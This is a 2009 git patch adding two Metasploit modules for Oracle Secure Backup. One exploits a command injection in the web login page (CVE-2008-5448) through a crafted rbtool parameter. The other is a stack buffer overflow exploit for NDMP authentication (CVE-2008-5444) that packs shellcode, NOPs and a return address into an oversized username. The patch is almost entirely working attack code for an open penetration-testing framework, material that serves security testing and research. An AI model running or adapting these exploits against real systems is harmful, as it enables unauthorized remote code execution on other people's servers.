From 7118ef0a2cddf8df8925db5f2a7bba963581e712 Mon Sep 17 00:00:00 2001 From: Mario Ceballos Date: Mon, 23 Feb 2009 16:26:00 +0000 Subject: [PATCH] added aux module osb_execqr.rb and exploit module osb_ndmp_auth.rb. git-svn-id: file:///home/svn/framework3/trunk@6248 4d416f70-5f16-0410-b530-b9f4589650da --- modules/auxiliary/admin/oracle/osb_execqr.rb | 56 ++++++++++++ .../exploits/windows/oracle/osb_ndmp_auth.rb | 88 +++++++++++++++++++ 2 files changed, 144 insertions(+) create mode 100644 modules/auxiliary/admin/oracle/osb_execqr.rb create mode 100644 modules/exploits/windows/oracle/osb_ndmp_auth.rb diff --git a/modules/auxiliary/admin/oracle/osb_execqr.rb b/modules/auxiliary/admin/oracle/osb_execqr.rb new file mode 100644 index 0000000000..75a6281938 --- /dev/null +++ b/modules/auxiliary/admin/oracle/osb_execqr.rb @@ -0,0 +1,56 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Oracle Secure Backup exec_qr() Command Injection Vulnerability', + 'Description' => %q{ + This module exploits a command injection vulnerablility in Oracle Secure Backup version 10.1.0.3 to 10.2.0.2. + }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: $', + 'References' => + [ + [ 'CVE', '2008-5448' ], + [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-003' ], + ], + 'DisclosureDate' => 'Jan 14 2009')) + + register_options( + [ + Opt::RPORT(443), + OptString.new('CMD', [ false, "The command to execute.", "cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt" ]), + OptBool.new('SSL', [true, 'Use SSL', true]), + ], self.class) + end + + def run + + r = Rex::Text.rand_text_english(2) + + cmd = datastore['CMD'] + + uri = "/login.php?clear=no&ora_osb_lcookie=&ora_osb_bgcookie=#{r}&button=Logout&rbtool=" + + req = uri + Rex::Text.uri_encode(cmd) + + print_status("Sending command: #{datastore['CMD']}...") + + res = send_request_raw({'uri' => req,},5) + + print_status("Done.") + + end +end diff --git a/modules/exploits/windows/oracle/osb_ndmp_auth.rb b/modules/exploits/windows/oracle/osb_ndmp_auth.rb new file mode 100644 index 0000000000..afadfc313b --- /dev/null +++ b/modules/exploits/windows/oracle/osb_ndmp_auth.rb @@ -0,0 +1,88 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + + include Msf::Exploit::Remote::NDMP + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow', + 'Description' => %q{ + The module exploits a stack overflow in Oracle Secure Backup. + When sending a specially crafted NDMP_CONNECT_CLIENT_AUTH packet, + an attacker may be able to execute arbitrary code. + }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision:$', + 'References' => + [ + [ 'CVE', '2008-5444' ], + [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html' ], + ], + 'Platform' => 'win', + 'Privileged' => true, + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00", + 'StackAdjustment' => -3500, + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", + }, + 'Targets' => + [ + [ 'Oracle Secure Backup 10.1.0.3 (Windows 2003 SP0/Windows XP SP3)', { 'Ret' => 0x608f5a28 } ], # oracore10.dll + ], + 'DisclosureDate' => 'Jan 14 2009', + 'DefaultTarget' => 0)) + + register_options([Opt::RPORT(10000)], self.class) + end + + def exploit + connect + + print_status("Trying target #{target.name}...") + + ndmp_recv() + + username = rand_text_alphanumeric(3789 - payload.encoded.length) + username << payload.encoded + Rex::Arch::X86.jmp_short(6) + username << make_nops(2) + [target.ret].pack('V') + [0xe8, -850].pack('CV') + username << rand_text_alphanumeric(5000 - 3793 - payload.encoded.length - 8 - 5) + + password = rand_text_alphanumeric(rand(25) + 1) + + # Create the authentication request + auth = [ + 0, # Sequence number + Time.now.to_i, # Current time + 0, # Message type (request) + 0x901, # Message name (connect_client_auth) + 0, # Reply sequence number + 0, # Error status + 1 # Authentication type + ].pack('NNNNNNN') + + [ username.length ].pack('N') + username + + [ password.length ].pack('N') + password + + [ 4 ].pack('N') + + print_status("Sending authentication request...") + ndmp_send(auth) + + handler + disconnect + end + +end